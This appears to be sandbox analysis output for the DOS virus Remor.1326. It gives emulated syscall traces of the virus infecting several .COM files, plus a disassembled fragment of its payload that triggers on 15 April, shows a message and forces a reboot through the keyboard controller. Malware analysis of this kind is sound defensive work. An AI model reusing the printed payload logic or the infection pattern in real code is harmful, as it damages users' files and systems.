Sample viewer

vx.netlux.org/Virus.DOS.Wit.Remor.1326

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:03:32.580677967Z 26 PC: 12ada | Set disk transfer address
2018-12-17T23:03:32.583183786Z 71 PC: 12aec | Get current directory
2018-12-17T23:03:32.586399312Z 42 PC: 12af2 | Get date
0x12af2: cmp dh, 4
0x12af5: jne 0x12b10
0x12af7: cmp dl, 0xf
0x12afa: jne 0x12b10
0x12afc: mov ax, 0x1010
0x12aff: out 0x70, ax
0x12b01: mov dx, 0x50b
0x12b04: mov ah, 9
0x12b06: int 0x21
0x12b08: mov ah, 8
0x12b0a: int 0x21
0x12b0c: mov al, 0xfe
0x12b0e: out 0x64, al
0x12b10: mov dx, 0x4f9
0x12b13: mov ah, byte ptr [0x5f0]
0x12b17: mov cl, 7
0x12b19: int 0x21
0x12b1b: jae 0x12b20
0x12b1d: jmp 0x12d95
0x12b20: mov dx, word ptr [0x52e]
2018-12-17T23:03:32.588870968Z 78 PC: 12b1b | Find first file
2018-12-17T23:03:32.596152782Z 67 PC: 12b37 | Get or set file attributes
2018-12-17T23:03:32.612151267Z 61 PC: 12b59 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:03:32.618523382Z 63 PC: 12b76 | Read file or device (Read 1323 bytes on handle 5)
2018-12-17T23:03:32.62502768Z 66 PC: 12ba1 | Move file pointer
2018-12-17T23:03:32.627425568Z 66 PC: 12bc3 | Move file pointer
2018-12-17T23:03:32.628956065Z 64 PC: 12bde | Write file or device (Write 407 bytes on handle 5)
2018-12-17T23:03:32.637741479Z 64 PC: 12bee | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:32.644732061Z 66 PC: 12c35 | Move file pointer
2018-12-17T23:03:32.646399431Z 64 PC: 12c47 | Write file or device (Write 1323 bytes on handle 5)
2018-12-17T23:03:32.6561584Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:03:32.659338314Z 67 PC: 12c6a | Get or set file attributes
2018-12-17T23:03:32.672274305Z 62 PC: 12c70 | Close file
2018-12-17T23:03:32.680258385Z 79 PC: 12b1b | Find next file
2018-12-17T23:03:32.683365543Z 67 PC: 12b37 | Get or set file attributes
2018-12-17T23:03:32.695678769Z 61 PC: 12b59 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:03:32.703026266Z 63 PC: 12b76 | Read file or device (Read 1323 bytes on handle 5)
2018-12-17T23:03:32.710069513Z 66 PC: 12ba1 | Move file pointer
2018-12-17T23:03:32.712766168Z 66 PC: 12bc3 | Move file pointer
2018-12-17T23:03:32.714868158Z 64 PC: 12bde | Write file or device (Write 27 bytes on handle 5)
2018-12-17T23:03:32.720200385Z 64 PC: 12bee | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:32.725044196Z 66 PC: 12c35 | Move file pointer
2018-12-17T23:03:32.726796065Z 64 PC: 12c47 | Write file or device (Write 1323 bytes on handle 5)
2018-12-17T23:03:32.736151322Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:03:32.742385159Z 67 PC: 12c6a | Get or set file attributes
2018-12-17T23:03:32.755021847Z 62 PC: 12c70 | Close file
2018-12-17T23:03:32.762972634Z 79 PC: 12b1b | Find next file
2018-12-17T23:03:32.767208072Z 67 PC: 12b37 | Get or set file attributes
2018-12-17T23:03:32.778632507Z 61 PC: 12b59 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:03:32.786507039Z 63 PC: 12b76 | Read file or device (Read 1323 bytes on handle 5)
2018-12-17T23:03:32.794027867Z 66 PC: 12ba1 | Move file pointer
2018-12-17T23:03:32.804475927Z 66 PC: 12bc3 | Move file pointer
2018-12-17T23:03:32.811411558Z 64 PC: 12bde | Write file or device (Write 92 bytes on handle 5)
2018-12-17T23:03:32.815676508Z 64 PC: 12bee | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:32.81980555Z 66 PC: 12c35 | Move file pointer
2018-12-17T23:03:32.821834914Z 64 PC: 12c47 | Write file or device (Write 1323 bytes on handle 5)
2018-12-17T23:03:32.830412237Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:03:32.832305233Z 67 PC: 12c6a | Get or set file attributes
2018-12-17T23:03:32.844073242Z 62 PC: 12c70 | Close file
2018-12-17T23:03:32.851733059Z 79 PC: 12b1b | Find next file
2018-12-17T23:03:32.855933605Z 67 PC: 12b37 | Get or set file attributes
2018-12-17T23:03:32.867175904Z 61 PC: 12b59 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:03:32.875639632Z 63 PC: 12b76 | Read file or device (Read 1323 bytes on handle 5)
2018-12-17T23:03:32.881560194Z 66 PC: 12ba1 | Move file pointer
2018-12-17T23:03:32.882868656Z 66 PC: 12bc3 | Move file pointer
2018-12-17T23:03:32.884188567Z 64 PC: 12bde | Write file or device (Write 29 bytes on handle 5)
2018-12-17T23:03:32.887421591Z 64 PC: 12bee | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:32.8898134Z 66 PC: 12c35 | Move file pointer
2018-12-17T23:03:32.891161893Z 64 PC: 12c47 | Write file or device (Write 1323 bytes on handle 5)
2018-12-17T23:03:32.897290743Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:03:32.899456303Z 67 PC: 12c6a | Get or set file attributes
2018-12-17T23:03:32.911336638Z 62 PC: 12c70 | Close file
2018-12-17T23:03:32.918981305Z 79 PC: 12b1b | Find next file
2018-12-17T23:03:32.922266799Z 67 PC: 12b37 | Get or set file attributes
2018-12-17T23:03:32.932991223Z 61 PC: 12b59 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:03:32.940992229Z 63 PC: 12b76 | Read file or device (Read 1323 bytes on handle 5)
2018-12-17T23:03:32.948425511Z 66 PC: 12ba1 | Move file pointer
2018-12-17T23:03:32.950021946Z 66 PC: 12bc3 | Move file pointer
2018-12-17T23:03:32.95144113Z 64 PC: 12bde | Write file or device (Write 29 bytes on handle 5)
2018-12-17T23:03:32.956907574Z 64 PC: 12bee | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:32.960348489Z 66 PC: 12c35 | Move file pointer
2018-12-17T23:03:32.962172267Z 64 PC: 12c47 | Write file or device (Write 1323 bytes on handle 5)
2018-12-17T23:03:32.972232348Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:03:32.974701262Z 67 PC: 12c6a | Get or set file attributes
2018-12-17T23:03:32.986773602Z 62 PC: 12c70 | Close file
2018-12-17T23:03:32.995284999Z 78 PC: 12b1b | Find first file
2018-12-17T23:03:33.001775161Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.009233684Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.01583442Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.022751706Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.029293197Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.036409246Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.043491182Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.049989538Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.056374606Z 78 PC: 12cd6 | Find first file
2018-12-17T23:03:33.063419088Z 59 PC: 12dba | Change current directory
2018-12-17T23:03:33.068561119Z 26 PC: 12dd7 | Set disk transfer address
2018-12-17T23:03:33.069550839Z 59 PC: 12de2 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14584,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:00.907671833Z 26 PC: 12ada | Set disk transfer address
2018-12-25T12:41:00.911518409Z 71 PC: 12aec | Get current directory
2018-12-25T12:41:00.915694207Z 42 PC: 12af2 | Get date
0x12af2: cmp dh, 4
0x12af5: jne 0x12b10
0x12af7: cmp dl, 0xf
0x12afa: jne 0x12b10
0x12afc: mov ax, 0x1010
0x12aff: out 0x70, ax
0x12b01: mov dx, 0x50b
0x12b04: mov ah, 9
0x12b06: int 0x21
0x12b08: mov ah, 8
0x12b0a: int 0x21
0x12b0c: mov al, 0xfe
0x12b0e: out 0x64, al
0x12b10: mov dx, 0x4f9
0x12b13: mov ah, byte ptr [0x5f0]
0x12b17: mov cl, 7
0x12b19: int 0x21
0x12b1b: jae 0x12b20
0x12b1d: jmp 0x12d95
0x12b20: mov dx, word ptr [0x52e]
2018-12-25T12:41:00.917758531Z 78 PC: 12b1b | Find first file
2018-12-25T12:41:00.923983158Z 67 PC: 12b37 | Get or set file attributes
2018-12-25T12:41:00.941115861Z 61 PC: 12b59 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:00.947995231Z 63 PC: 12b76 | Read file or device (Read 1323 bytes on handle 5)
2018-12-25T12:41:00.954601938Z 66 PC: 12ba1 | Move file pointer
2018-12-25T12:41:00.957414047Z 66 PC: 12bc3 | Move file pointer
2018-12-25T12:41:00.959170795Z 64 PC: 12bde | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:41:00.967560746Z 64 PC: 12bee | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:41:00.971299481Z 66 PC: 12c35 | Move file pointer
2018-12-25T12:41:00.97551687Z 64 PC: 12c47 | Write file or device (Write 1323 bytes on handle 5)
2018-12-25T12:41:00.984613603Z 87 PC: 12c58 | Get or set file date and time
2018-12-25T12:41:00.987004953Z 67 PC: 12c6a | Get or set file attributes
2018-12-25T12:41:00.998180476Z 62 PC: 12c70 | Close file
2018-12-25T12:41:01.005270401Z 79 PC: 12b1b | Find next file (See above)
2018-12-25T12:41:01.009517293Z 67 PC: 12b37 | Get or set file attributes (See above)
2018-12-25T12:41:01.019274251Z 61 PC: 12b59 | Open file (See above)
2018-12-25T12:41:01.025940929Z 63 PC: 12b76 | Read file or device (See above)
2018-12-25T12:41:01.032714706Z 66 PC: 12ba1 | Move file pointer (See above)
2018-12-25T12:41:01.035643397Z 66 PC: 12bc3 | Move file pointer (See above)
2018-12-25T12:41:01.036986227Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:41:01.040706921Z 64 PC: 12bee | Write file or device (See above)
2018-12-25T12:41:01.044786609Z 66 PC: 12c35 | Move file pointer (See above)
2018-12-25T12:41:01.046198535Z 64 PC: 12c47 | Write file or device (See above)
2018-12-25T12:41:01.053824913Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:41:01.056774701Z 67 PC: 12c6a | Get or set file attributes (See above)
2018-12-25T12:41:01.067681592Z 62 PC: 12c70 | Close file (See above)
2018-12-25T12:41:01.074698113Z 79 PC: 12b1b | Find next file (See above)
2018-12-25T12:41:01.078509127Z 67 PC: 12b37 | Get or set file attributes (See above)
2018-12-25T12:41:01.088603406Z 61 PC: 12b59 | Open file (See above)
2018-12-25T12:41:01.095167307Z 63 PC: 12b76 | Read file or device (See above)
2018-12-25T12:41:01.102171706Z 66 PC: 12ba1 | Move file pointer (See above)
2018-12-25T12:41:01.103720852Z 66 PC: 12bc3 | Move file pointer (See above)
2018-12-25T12:41:01.105089551Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:41:01.109479963Z 64 PC: 12bee | Write file or device (See above)
2018-12-25T12:41:01.112195366Z 66 PC: 12c35 | Move file pointer (See above)
2018-12-25T12:41:01.113488926Z 64 PC: 12c47 | Write file or device (See above)
2018-12-25T12:41:01.121312987Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:41:01.122750416Z 67 PC: 12c6a | Get or set file attributes (See above)
2018-12-25T12:41:01.133558075Z 62 PC: 12c70 | Close file (See above)
2018-12-25T12:41:01.141147574Z 79 PC: 12b1b | Find next file (See above)
2018-12-25T12:41:01.144099724Z 67 PC: 12b37 | Get or set file attributes (See above)
2018-12-25T12:41:01.15045884Z 61 PC: 12b59 | Open file (See above)
2018-12-25T12:41:01.154829539Z 63 PC: 12b76 | Read file or device (See above)
2018-12-25T12:41:01.159432702Z 66 PC: 12ba1 | Move file pointer (See above)
2018-12-25T12:41:01.16050762Z 66 PC: 12bc3 | Move file pointer (See above)
2018-12-25T12:41:01.161509171Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:41:01.165378567Z 64 PC: 12bee | Write file or device (See above)
2018-12-25T12:41:01.168289673Z 66 PC: 12c35 | Move file pointer (See above)
2018-12-25T12:41:01.169474992Z 64 PC: 12c47 | Write file or device (See above)
2018-12-25T12:41:01.176834606Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:41:01.178164898Z 67 PC: 12c6a | Get or set file attributes (See above)
2018-12-25T12:41:01.188251281Z 62 PC: 12c70 | Close file (See above)
2018-12-25T12:41:01.19562383Z 79 PC: 12b1b | Find next file (See above)
2018-12-25T12:41:01.198352419Z 67 PC: 12b37 | Get or set file attributes (See above)
2018-12-25T12:41:01.207729541Z 61 PC: 12b59 | Open file (See above)
2018-12-25T12:41:01.215224129Z 63 PC: 12b76 | Read file or device (See above)
2018-12-25T12:41:01.221181316Z 66 PC: 12ba1 | Move file pointer (See above)
2018-12-25T12:41:01.222439411Z 66 PC: 12bc3 | Move file pointer (See above)
2018-12-25T12:41:01.224747121Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:41:01.228296456Z 64 PC: 12bee | Write file or device (See above)
2018-12-25T12:41:01.230861113Z 66 PC: 12c35 | Move file pointer (See above)
2018-12-25T12:41:01.232575151Z 64 PC: 12c47 | Write file or device (See above)
2018-12-25T12:41:01.240028457Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:41:01.241463666Z 67 PC: 12c6a | Get or set file attributes (See above)
2018-12-25T12:41:01.252204264Z 62 PC: 12c70 | Close file (See above)
2018-12-25T12:41:01.259262754Z 78 PC: 12b1b | Find first file (See above)
2018-12-25T12:41:01.264978008Z 78 PC: 12cd6 | Find first file
2018-12-25T12:41:01.270778701Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.27644823Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.282042783Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.29228197Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.302660687Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.313021157Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.319133612Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.324898846Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.330423118Z 59 PC: 12dba | Change current directory
2018-12-25T12:41:01.334527477Z 26 PC: 12dd7 | Set disk transfer address
2018-12-25T12:41:01.33628303Z 59 PC: 12de2 | Change current directory

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14584,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:01.142994371Z 26 PC: 12ada | Set disk transfer address
2018-12-25T12:41:01.147678821Z 71 PC: 12aec | Get current directory
2018-12-25T12:41:01.150719009Z 42 PC: 12af2 | Get date
0x12af2: cmp dh, 4
0x12af5: jne 0x12b10
0x12af7: cmp dl, 0xf
0x12afa: jne 0x12b10
0x12afc: mov ax, 0x1010
0x12aff: out 0x70, ax
0x12b01: mov dx, 0x50b
0x12b04: mov ah, 9
0x12b06: int 0x21
0x12b08: mov ah, 8
0x12b0a: int 0x21
0x12b0c: mov al, 0xfe
0x12b0e: out 0x64, al
0x12b10: mov dx, 0x4f9
0x12b13: mov ah, byte ptr [0x5f0]
0x12b17: mov cl, 7
0x12b19: int 0x21
0x12b1b: jae 0x12b20
0x12b1d: jmp 0x12d95
0x12b20: mov dx, word ptr [0x52e]
2018-12-25T12:41:01.15301545Z 78 PC: 12b1b | Find first file
2018-12-25T12:41:01.159904345Z 67 PC: 12b37 | Get or set file attributes
2018-12-25T12:41:01.179955115Z 61 PC: 12b59 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:01.187512902Z 63 PC: 12b76 | Read file or device (Read 1323 bytes on handle 5)
2018-12-25T12:41:01.195009774Z 66 PC: 12ba1 | Move file pointer
2018-12-25T12:41:01.197452309Z 66 PC: 12bc3 | Move file pointer
2018-12-25T12:41:01.199243362Z 64 PC: 12bde | Write file or device (Write 407 bytes on handle 5)
2018-12-25T12:41:01.208059127Z 64 PC: 12bee | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:41:01.211806148Z 66 PC: 12c35 | Move file pointer
2018-12-25T12:41:01.213402722Z 64 PC: 12c47 | Write file or device (Write 1323 bytes on handle 5)
2018-12-25T12:41:01.223350881Z 87 PC: 12c58 | Get or set file date and time
2018-12-25T12:41:01.225870765Z 67 PC: 12c6a | Get or set file attributes
2018-12-25T12:41:01.237681071Z 62 PC: 12c70 | Close file
2018-12-25T12:41:01.245977212Z 79 PC: 12b1b | Find next file (See above)
2018-12-25T12:41:01.249418636Z 67 PC: 12b37 | Get or set file attributes (See above)
2018-12-25T12:41:01.260541028Z 61 PC: 12b59 | Open file (See above)
2018-12-25T12:41:01.268247966Z 63 PC: 12b76 | Read file or device (See above)
2018-12-25T12:41:01.276031932Z 66 PC: 12ba1 | Move file pointer (See above)
2018-12-25T12:41:01.278606212Z 66 PC: 12bc3 | Move file pointer (See above)
2018-12-25T12:41:01.281316795Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:41:01.285937266Z 64 PC: 12bee | Write file or device (See above)
2018-12-25T12:41:01.290006036Z 66 PC: 12c35 | Move file pointer (See above)
2018-12-25T12:41:01.291963389Z 64 PC: 12c47 | Write file or device (See above)
2018-12-25T12:41:01.300781986Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:41:01.303106476Z 67 PC: 12c6a | Get or set file attributes (See above)
2018-12-25T12:41:01.314886813Z 62 PC: 12c70 | Close file (See above)
2018-12-25T12:41:01.322642906Z 79 PC: 12b1b | Find next file (See above)
2018-12-25T12:41:01.327234689Z 67 PC: 12b37 | Get or set file attributes (See above)
2018-12-25T12:41:01.338514565Z 61 PC: 12b59 | Open file (See above)
2018-12-25T12:41:01.347852726Z 63 PC: 12b76 | Read file or device (See above)
2018-12-25T12:41:01.355808781Z 66 PC: 12ba1 | Move file pointer (See above)
2018-12-25T12:41:01.357510534Z 66 PC: 12bc3 | Move file pointer (See above)
2018-12-25T12:41:01.359053157Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:41:01.363955115Z 64 PC: 12bee | Write file or device (See above)
2018-12-25T12:41:01.367125803Z 66 PC: 12c35 | Move file pointer (See above)
2018-12-25T12:41:01.368940264Z 64 PC: 12c47 | Write file or device (See above)
2018-12-25T12:41:01.377765441Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:41:01.380202447Z 67 PC: 12c6a | Get or set file attributes (See above)
2018-12-25T12:41:01.39243704Z 62 PC: 12c70 | Close file (See above)
2018-12-25T12:41:01.400281485Z 79 PC: 12b1b | Find next file (See above)
2018-12-25T12:41:01.403958454Z 67 PC: 12b37 | Get or set file attributes (See above)
2018-12-25T12:41:01.416593208Z 61 PC: 12b59 | Open file (See above)
2018-12-25T12:41:01.424089265Z 63 PC: 12b76 | Read file or device (See above)
2018-12-25T12:41:01.43209011Z 66 PC: 12ba1 | Move file pointer (See above)
2018-12-25T12:41:01.433529243Z 66 PC: 12bc3 | Move file pointer (See above)
2018-12-25T12:41:01.435068477Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:41:01.440082314Z 64 PC: 12bee | Write file or device (See above)
2018-12-25T12:41:01.443186138Z 66 PC: 12c35 | Move file pointer (See above)
2018-12-25T12:41:01.444654357Z 64 PC: 12c47 | Write file or device (See above)
2018-12-25T12:41:01.453820549Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:41:01.45543652Z 67 PC: 12c6a | Get or set file attributes (See above)
2018-12-25T12:41:01.466922924Z 62 PC: 12c70 | Close file (See above)
2018-12-25T12:41:01.474964126Z 79 PC: 12b1b | Find next file (See above)
2018-12-25T12:41:01.479922554Z 67 PC: 12b37 | Get or set file attributes (See above)
2018-12-25T12:41:01.490329966Z 61 PC: 12b59 | Open file (See above)
2018-12-25T12:41:01.497409456Z 63 PC: 12b76 | Read file or device (See above)
2018-12-25T12:41:01.504595062Z 66 PC: 12ba1 | Move file pointer (See above)
2018-12-25T12:41:01.505958799Z 66 PC: 12bc3 | Move file pointer (See above)
2018-12-25T12:41:01.507317323Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:41:01.511981533Z 64 PC: 12bee | Write file or device (See above)
2018-12-25T12:41:01.513913141Z 66 PC: 12c35 | Move file pointer (See above)
2018-12-25T12:41:01.514913316Z 64 PC: 12c47 | Write file or device (See above)
2018-12-25T12:41:01.520727852Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:41:01.522306937Z 67 PC: 12c6a | Get or set file attributes (See above)
2018-12-25T12:41:01.534065554Z 62 PC: 12c70 | Close file (See above)
2018-12-25T12:41:01.542594584Z 78 PC: 12b1b | Find first file (See above)
2018-12-25T12:41:01.549029782Z 78 PC: 12cd6 | Find first file
2018-12-25T12:41:01.555472828Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.562876034Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.569326177Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.581265724Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.593382946Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.605702498Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.611921102Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.61812632Z 78 PC: 12cd6 | Find first file (See above)
2018-12-25T12:41:01.624786075Z 59 PC: 12dba | Change current directory
2018-12-25T12:41:01.629628249Z 26 PC: 12dd7 | Set disk transfer address
2018-12-25T12:41:01.630736937Z 59 PC: 12de2 | Change current directory

{"DateBased":true,"Day":15,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14584,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:01.664769282Z 26 PC: 12ada | Set disk transfer address
2018-12-25T12:41:01.667779506Z 71 PC: 12aec | Get current directory
2018-12-25T12:41:01.671040714Z 42 PC: 12af2 | Get date
0x12af2: cmp dh, 4
0x12af5: jne 0x12b10
0x12af7: cmp dl, 0xf
0x12afa: jne 0x12b10
0x12afc: mov ax, 0x1010
0x12aff: out 0x70, ax
0x12b01: mov dx, 0x50b
0x12b04: mov ah, 9
0x12b06: int 0x21
0x12b08: mov ah, 8
0x12b0a: int 0x21
0x12b0c: mov al, 0xfe
0x12b0e: out 0x64, al
0x12b10: mov dx, 0x4f9
0x12b13: mov ah, byte ptr [0x5f0]
0x12b17: mov cl, 7
0x12b19: int 0x21
0x12b1b: jae 0x12b20
0x12b1d: jmp 0x12d95
0x12b20: mov dx, word ptr [0x52e]
2018-12-25T12:41:01.674042037Z 9 PC: 12b08 | Display string (String= '��ࠡ���� - rulez forever ! ')
2018-12-25T12:41:01.678736801Z 8 PC: 12b0c | Console input without echo